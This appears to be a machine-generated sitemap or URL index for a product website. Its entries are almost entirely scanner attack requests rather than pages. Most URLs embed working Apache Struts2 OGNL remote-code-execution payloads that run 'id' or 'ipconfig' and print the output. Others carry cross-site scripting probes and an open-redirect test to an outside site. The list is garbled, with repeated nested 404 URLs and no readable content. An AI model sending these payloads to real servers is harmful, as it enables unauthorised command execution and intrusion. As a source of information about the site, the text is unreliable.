http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?=%3c320148%20x%3d983366626%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=%3c060997%20x%3d953614958%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=%3c668531%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=%3c985b48%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2532%2535%2535 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=%3c193ba8%20x%3d919679475%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?=%3c623570%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=%3cb75723%20x%3d952828573%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=%3c66001a%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=%3c383863%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f=%3c623570%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=%3c236166%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?=%3c36ab45%20x%3d911948411%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?=%3c565470%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=%3cb28555%20x%3d982284321%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=%3c105a95%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f=%3c70b656%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f=%3c565470%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=%3c0a022b%20x%3d927622797%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=%3c0a022b+x%3d927622797%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=%3c1b52ba%20x%3d988513569%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=%3c3013a9%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f=%3c1b52ba+x%3d988513569%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=%3c3013a9%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=%3c1a99b6%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f=%3c1a99b6%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm13717%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem16365?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm99585%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem42559?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 